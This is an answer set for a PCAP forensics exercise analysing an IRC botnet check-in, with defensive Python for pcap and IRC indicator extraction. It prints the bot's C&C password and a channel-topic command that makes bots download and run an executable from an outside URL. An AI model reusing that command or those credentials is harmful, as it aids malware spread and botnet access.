
Answers

The document analyzes network traffic from a PCAP file and identifies: 1. Three IP addresses are involved in the communication, one public address hosted in France and two private (RFC 1918) addresses. 2. One private address answers DNS, the other is the infected client, and the public address runs an IRC command-and-control server on TCP port 5540. 3. The PCAP shows the IRC session in which an already-infected client checks in to the C&C channel, finds a download instruction for a second executable in the channel topic, and reports that it has spread to a removable drive via autorun.inf. This is malware under IRC-based botnet control.

Uploaded by

rajuraikar

Answers:-

---------------------------------------------------------------------------------------------------------------------------------------

Question 1. Write down the IP addresses of all the machines involved

Tool Used: Wireshark

Total IPs: 3

91.121.100.60

192.168.45.2

192.168.45.130

---------------------------------------------------------------------------------------------------------------------------------------

Question 2. What is the location of these IP addresses?

Site Used: www.hostip.info

IP: 91.121.100.60

Host name: ns353908.ovh.net.

IP address: 91.121.100.60

Location: Paris, FRANCE

The hostname ns353908.ovh.net shows this is a rented server at the hosting provider OVH, so the geolocation tells us where the datacentre is, not who operates the botnet.

The remaining two addresses are private (RFC 1918, 192.168.0.0/16) and cannot be geolocated; they belong to the network where the capture was taken:

192.168.45.2

192.168.45.130

---------------------------------------------------------------------------------------------------------------------------------------

Question 3. What services run on these IP addresses?

On 91.121.100.60, TCP port 5540 is listening. The SANS/IANA port table lists 5540 as "sdreport", but that assignment is irrelevant here: the traffic on this port is IRC, and the server's own replies identify it as sex.accesox.net running Unreal3.2.9-rc1 (UnrealIRCd). A port number above 1024 says nothing reliable about the protocol; the payload does.

On 192.168.45.2, UDP port 53 is listening, i.e. it is the DNS resolver the client uses.

192.168.45.130 runs no service that the capture shows. TCP 1038 and UDP 1037 are the client's ephemeral source ports (consistent with a Windows XP-era host, which allocates them upward from 1025): UDP 1037 is the source port of the DNS query to 192.168.45.2:53, and TCP 1038 is the source port of the outbound connection to 91.121.100.60:5540. Mapping them to Message Tracking Query Protocol (MTQP) via the port table is a mistake; a port is only a service on the side that receives the SYN (TCP) or the query (UDP). This host is the infected machine.
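As an added example (not part of the original answers), the following Python walks a classic pcap file with only the standard library, classifies every address as private or public with the ipaddress module, and decides which side of each flow is the listener from the direction of the TCP SYN (for UDP it falls back to the well-known-port heuristic). It runs over a constructed six-packet capture that reuses the addresses and ports from Questions 1 to 3; the packets, timestamps and payloads are made up, and the code does not parse DNS or IRC payloads. It shows why 1037/1038 on 192.168.45.130 are ephemeral ports rather than services.

```python
"""Enumerate hosts, listeners and conversations from a classic pcap (stdlib only)."""
import ipaddress
import struct

ETHERTYPE_IPV4 = 0x0800
PROTO_TCP, PROTO_UDP = 6, 17
TCP_SYN, TCP_ACK, TCP_PSH = 0x02, 0x10, 0x08


def iter_frames(pcap: bytes):
    """Yield raw Ethernet frames from a classic (libpcap) capture; pcapng is not handled."""
    magic = pcap[:4]
    if magic in (b"\xd4\xc3\xb2\xa1", b"\x4d\x3c\xb2\xa1"):
        endian = "<"
    elif magic in (b"\xa1\xb2\xc3\xd4", b"\xa1\xb2\x3c\x4d"):
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet (linktype 1) captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def decode_ipv4(frame: bytes):
    """Return (src, dst, proto, sport, dport, tcp_flags) for IPv4 TCP/UDP frames, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl, proto = (ip[0] & 0x0F) * 4, ip[9]
    l4 = ip[ihl:]
    if proto not in (PROTO_TCP, PROTO_UDP) or len(l4) < 8:
        return None
    src, dst = str(ipaddress.IPv4Address(ip[12:16])), str(ipaddress.IPv4Address(ip[16:20]))
    sport, dport = struct.unpack("!HH", l4[:4])
    flags = l4[13] if proto == PROTO_TCP else 0
    return src, dst, proto, sport, dport, flags


def analyse(pcap: bytes):
    """Classify each host, record observed listeners, and collapse packets into conversations."""
    hosts, listeners, conversations = {}, set(), set()
    for frame in iter_frames(pcap):
        decoded = decode_ipv4(frame)
        if decoded is None:
            continue
        src, dst, proto, sport, dport, flags = decoded
        name = "tcp" if proto == PROTO_TCP else "udp"
        for ip in (src, dst):
            hosts[ip] = "private" if ipaddress.ip_address(ip).is_private else "public"
        if proto == PROTO_TCP:
            # Only a bare SYN tells us who is listening; the sender's port is ephemeral.
            if flags & (TCP_SYN | TCP_ACK) == TCP_SYN:
                listeners.add((dst, name, dport))
        elif dport < 1024 <= sport:
            # UDP has no handshake: treat the well-known port as the service side (heuristic).
            listeners.add((dst, name, dport))
        # Direction-independent key, like Wireshark's Conversations view.
        conversations.add((name,) + tuple(sorted([(src, sport), (dst, dport)])))
    return hosts, listeners, conversations


# ---- constructed sample capture (made up; mirrors the addresses/ports of Q1 to Q3) ----
def _eth(payload):
    return b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + payload

def _ipv4(src, dst, proto, payload):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return _eth(hdr + payload)

def _tcp(src, sport, dst, dport, flags):
    return _ipv4(src, dst, PROTO_TCP, struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, flags, 8192, 0, 0))

def _udp(src, sport, dst, dport):
    return _ipv4(src, dst, PROTO_UDP, struct.pack("!HHHH", sport, dport, 8, 0))

def build_pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # little-endian, Ethernet
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1300000000 + i, 0, len(f), len(f)) + f
    return out

CLIENT, RESOLVER, CNC = "192.168.45.130", "192.168.45.2", "91.121.100.60"
SAMPLE_PCAP = build_pcap([
    _udp(CLIENT, 1037, RESOLVER, 53),                   # DNS query for the IRC server name
    _udp(RESOLVER, 53, CLIENT, 1037),                   # DNS answer
    _tcp(CLIENT, 1038, CNC, 5540, TCP_SYN),             # client opens the IRC connection
    _tcp(CNC, 5540, CLIENT, 1038, TCP_SYN | TCP_ACK),
    _tcp(CLIENT, 1038, CNC, 5540, TCP_ACK),
    _tcp(CNC, 5540, CLIENT, 1038, TCP_PSH | TCP_ACK),   # server banner follows here
])

if __name__ == "__main__":
    hosts, listeners, conversations = analyse(SAMPLE_PCAP)
    for ip, kind in sorted(hosts.items()):
        svc = sorted(f"{p}/{port}" for h, p, port in listeners if h == ip)
        print(ip, kind, svc or "no listener seen")
    print(len(conversations), "conversations")
```

Only the public address is worth a geolocation lookup; the two private ones get "private" from the ipaddress module before any lookup is attempted. The SYN rule is what separates a listener from an ephemeral port, which is the mistake the MTQP answer makes.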

---------------------------------------------------------------------------------------------------------------------------------------

Question 4. Please explain the attack in detail and what you think is going on in this PCAP file:
From the IRC stream in the PCAP we can see Command and Control communication between an infected client (192.168.45.130, source port tcp/1038) and a C&C server (91.121.100.60, tcp/5540) over IRC.

IRC Server: irc.accesox.net (resolved via DNS; the server calls itself sex.accesox.net and reports version Unreal3.2.9-rc1)

Server password: mierdaq

Nick Name: pLagUe{USA}64007 (a country tag plus a random number, the usual way IRC bots give each victim a unique nick)

Channel: ##verga##

Sequence of events:

1. The client resolves irc.accesox.net through 192.168.45.2 and connects to 91.121.100.60:5540.

2. It registers with PASS mierdaq / NICK pLagUe{USA}64007 / USER SkuZ, repeatedly sends MODE -ix to undo the invisible (+i) and hidden-host (+x) modes the server sets on connect, and joins ##verga##.

3. On join it announces itself to the channel:

PRIVMSG ##verga## :.4.NueVo PuTo InfeCcIoN.

(Spanish, an expletive-laden "new infection", i.e. a new victim checking in.)

4. The channel topic (numeric 332), set by "ragebot" at 1298999449 (2011-03-01 17:10:49 UTC, numeric 333), carries the command the herder wants every bot to run on join:

!downloaditz http://www.freewebtown.com/redzone/plaga.exe c:\jiji.exe 1

i.e. download plaga.exe and save it as c:\jiji.exe. Putting the command in the topic means the herder does not have to be online: each bot reads it the moment it joins. Whether this client actually fetched the file is not visible in the IRC stream; look for HTTP traffic to www.freewebtown.com elsewhere in the capture.

5. The bot then reports a propagation action:

PRIVMSG ##verga## :.4.{. USB.4 }.. Injected Virus into .4.autorun.inf.. on drive.4. D:

The client was already infected before the capture; this message says the malware has written an autorun.inf infection to drive D: (a removable drive), so it also spreads over USB.

6. The server answers both PRIVMSGs with 404 "You need voice (+v)": the channel is moderated, so the bots' reports never reach the channel and only the operators' commands are visible. The 482 "You're not channel operator" reply is the bot's failed attempt to change channel modes, and the NickServ notice "Your nick isn't registered" is just the network's services reacting to an unregistered nick.

The ".4." sequences in the messages are mIRC colour codes (control character 0x03 followed by colour number 4, red) that the export has rendered as dots.

Below is the reassembled IRC stream. Lines without a prefix were sent by the client; lines beginning with ":sex.accesox.net" are server replies.


PASS mierdaq

NICK pLagUe{USA}64007

USER SkuZ * ok .4.TeaM UniX b0at 0.4

:sex.accesox.net NOTICE AUTH :*** Looking up your hostname...

:sex.accesox.net NOTICE AUTH :*** Checking ident...

:sex.accesox.net NOTICE AUTH :*** No ident response; username prefixed with ~

:sex.accesox.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

PING :56EF9DAC

PONG 56EF9DAC

:sex.accesox.net 001 pLagUe{USA}64007 :Welcome to the AccesoX IRC Network pLagUe{USA}[email protected]

:sex.accesox.net 002 pLagUe{USA}64007 :Your host is sex.accesox.net, running version Unreal3.2.9-rc1

:sex.accesox.net 003 pLagUe{USA}64007 :This server was created ven mar 25 2011 at 02:34:51 CET

:sex.accesox.net 004 pLagUe{USA}64007 sex.accesox.net Unreal3.2.9-rc1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ

:sex.accesox.net 005 pLagUe{USA}64007 CMDS=KNOCK,MAP,DCCALLOW,USERIP UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=16 CHANLIMIT=#:16 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 :are supported by this server

:sex.accesox.net 005 pLagUe{USA}64007 MAXTARGETS=20 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ NETWORK=AccesoX CASEMAPPING=ascii EXTBAN=~,qjncrR ELIST=MNUCT :are supported by this server

:sex.accesox.net 005 pLagUe{USA}64007 STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

PRIVMSG ##verga## :.4.NueVo PuTo InfeCcIoN.


:sex.accesox.net 251 pLagUe{USA}64007 :There are 56 users and 189 invisible on 9 servers

:sex.accesox.net 252 pLagUe{USA}64007 8 :operator(s) online

:sex.accesox.net 253 pLagUe{USA}64007 1 :unknown connection(s)

:sex.accesox.net 254 pLagUe{USA}64007 30 :channels formed

:sex.accesox.net 255 pLagUe{USA}64007 :I have 28 clients and 0 servers

:sex.accesox.net 265 pLagUe{USA}64007 :Current Local Users: 28 Max: 196

:sex.accesox.net 266 pLagUe{USA}64007 :Current Global Users: 245 Max: 2976

:sex.accesox.net 372 pLagUe{USA}64007 :- This is the short MOTD. To view the complete MOTD type /motd

:sex.accesox.net 372 pLagUe{USA}64007 :-

:sex.accesox.net 376 pLagUe{USA}64007 :End of /MOTD command.

:pLagUe{USA}64007 MODE pLagUe{USA}64007 :+ix

:[email protected] NOTICE pLagUe{USA}64007 :[.Random News. - Oct 14 2010] Registren sus nick de nuevo ... gracias.

:[email protected] NOTICE pLagUe{USA}64007 :Your nick isn't registered.

:pLagUe{USA}64007 MODE pLagUe{USA}64007 :-ix

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

MODE pLagUe{USA}64007 -ix

JOIN ##verga##

JOIN ##verga##

:pLagUe{USA}[email protected] JOIN :##verga##

:sex.accesox.net 332 pLagUe{USA}64007 ##verga## :!downloaditz http://www.freewebtown.com/redzone/plaga.exe c:\jiji.exe 1

:sex.accesox.net 333 pLagUe{USA}64007 ##verga## ragebot 1298999449

:sex.accesox.net 353 pLagUe{USA}64007 @ ##verga## :pLagUe{USA}64007

:sex.accesox.net 366 pLagUe{USA}64007 ##verga## :End of /NAMES list.

:sex.accesox.net 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)

MODE ##verga## -ix

:sex.accesox.net 482 pLagUe{USA}64007 ##verga## :You're not channel operator

PRIVMSG ##verga## :.4.{. USB.4 }.. Injected Virus into .4.autorun.inf.. on drive.4. D:

:sex.accesox.net 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)

PING :sex.accesox.net

PONG sex.accesox.net
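As an added example (not the original author's work), the following Python parses raw IRC lines into prefix, command and parameters, strips mIRC formatting codes, and pulls out the indicators an analyst records from a bot check-in: server password, nick and ident, server name and ircd version, channels joined, the topic command with its URL and drop path, the bot's own status reports, and how many of them the server refused with 404. The sample session is a constructed subset of the stream above; the 0x03/0x02 control bytes are reinserted where the export shows dots (that exact byte layout is an assumption), and the host 198.51.100.23 is a documentation-range placeholder for the client address the export did not preserve.

```python
"""Extract C&C indicators from a bot's IRC session (constructed example)."""
import re
from datetime import datetime, timezone

# mIRC formatting: 0x03 with optional fg[,bg] colour, plus bold/reset/reverse/italic/underline toggles.
MIRC_FORMAT = re.compile(r"\x03(?:\d{1,2}(?:,\d{1,2})?)?|[\x02\x0f\x16\x1d\x1f]")
# Topic-driven bot command "<!verb> <url> <local path> [flag]"; the verb name is bot-family specific.
TOPIC_COMMAND = re.compile(r"^!(?P<verb>\w+)\s+(?P<url>https?://\S+)\s+(?P<save_as>\S+)(?:\s+(?P<flag>\S+))?")


def strip_mirc(text: str) -> str:
    return MIRC_FORMAT.sub("", text)


def parse_irc(line: str):
    """Split one RFC 1459 line into (prefix, COMMAND, params); the trailing param keeps its spaces."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    return prefix, params[0].upper(), params[1:]


def parse_topic_command(topic: str):
    m = TOPIC_COMMAND.match(strip_mirc(topic).strip())
    return m.groupdict() if m else None


def summarize_session(lines):
    """Walk a client<->server IRC stream; lines without a prefix were sent by the client."""
    r = {"channels": set(), "bot_reports": [], "undelivered": 0, "topic_command": None}
    for raw in lines:
        if not raw.strip():
            continue
        prefix, cmd, params = parse_irc(raw)
        from_client = prefix is None
        if cmd == "PASS" and from_client:
            r["password"] = params[0]
        elif cmd == "NICK" and from_client:
            r["nick"] = params[0]
        elif cmd == "USER" and from_client:
            r["ident"] = params[0]
        elif cmd == "004":                      # RPL_MYINFO: server name and ircd version
            r["server"], r["ircd"] = params[1], params[2]
        elif cmd == "JOIN" and from_client:
            r["channels"].add(params[0])
        elif cmd == "332":                      # RPL_TOPIC: the herder's standing command
            r["topic"] = strip_mirc(params[-1])
            r["topic_command"] = parse_topic_command(params[-1])
        elif cmd == "333":                      # RPL_TOPICWHOTIME: who set it and when
            r["topic_set_by"] = params[2]
            r["topic_set_at_utc"] = datetime.fromtimestamp(int(params[3]), tz=timezone.utc).isoformat()
        elif cmd == "PRIVMSG" and from_client:  # the bot reporting to its herder
            r["bot_reports"].append((params[0], strip_mirc(params[1])))
        elif cmd == "404":                      # ERR_CANNOTSENDTOCHAN: the report was dropped
            r["undelivered"] += 1
    return r


# Constructed subset of the captured session; control bytes and the client host are assumptions.
SAMPLE_SESSION = [
    "PASS mierdaq",
    "NICK pLagUe{USA}64007",
    "USER SkuZ * ok :\x034TeaM UniX b0at 0.4",
    ":sex.accesox.net 001 pLagUe{USA}64007 :Welcome to the AccesoX IRC Network pLagUe{USA}64007!~SkuZ@198.51.100.23",
    ":sex.accesox.net 004 pLagUe{USA}64007 sex.accesox.net Unreal3.2.9-rc1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ",
    "PING :56EF9DAC",
    "PONG 56EF9DAC",
    "JOIN ##verga##",
    "PRIVMSG ##verga## :\x034NueVo PuTo InfeCcIoN.",
    ":pLagUe{USA}64007!~SkuZ@198.51.100.23 JOIN :##verga##",
    ":sex.accesox.net 332 pLagUe{USA}64007 ##verga## :!downloaditz http://www.freewebtown.com/redzone/plaga.exe c:\\jiji.exe 1",
    ":sex.accesox.net 333 pLagUe{USA}64007 ##verga## ragebot 1298999449",
    ":sex.accesox.net 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)",
    "PRIVMSG ##verga## :\x034\x02{\x02 USB\x034 }\x02\x02 Injected Virus into \x034\x02autorun.inf\x02\x02 on drive\x034\x02 D:",
    ":sex.accesox.net 404 pLagUe{USA}64007 ##verga## :You need voice (+v) (##verga##)",
]

if __name__ == "__main__":
    for key, value in sorted(summarize_session(SAMPLE_SESSION).items()):
        print(f"{key:18} {value}")
```

The same walk works on a stream exported from Wireshark's "Follow TCP Stream" (raw, one direction or both) as long as client and server lines can be told apart, which the prefix rule does for any RFC 1459 server. The topic command and the 404 count are the two things worth keeping as indicators: the URL and drop path feed blocklists and host triage, and the refused reports show the channel is moderated, so a live view of it will not reveal the bot population.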

---------------------------------------------------------------------------------------------------------------------------------------
